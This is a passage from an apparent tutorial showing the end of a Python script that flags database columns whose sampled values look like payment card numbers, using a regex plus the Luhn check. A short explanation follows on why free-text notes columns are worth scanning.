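        "1234567890123",         # 13 digits but fails the Luhn check
        "5551234567890",         # 13 digits but fails the Luhn check
    ],
    "dbo.Orders.Notes": [
        "Paid with 4111111111111112 (typo), retried with 4111111111111111",
        "Call back on 555-123-4567",   # too short to be a candidate
    ],
}


if __name__ == "__main__":
    for column, count in classify_samples(SAMPLE_COLUMNS).items():
        total = len(SAMPLE_COLUMNS[column])
        print(f"{column}: {count} of {total} samples look like card numbers")
```

The Luhn check is what keeps the regex useful: a 13-digit order id matches the digit-run pattern but fails mod 10, so only the CardNo column and the free-text Notes column are flagged. Free-text columns are worth keeping on the report, since card data that leaks into notes fields is rarely covered by the encryption applied to the dedicated column.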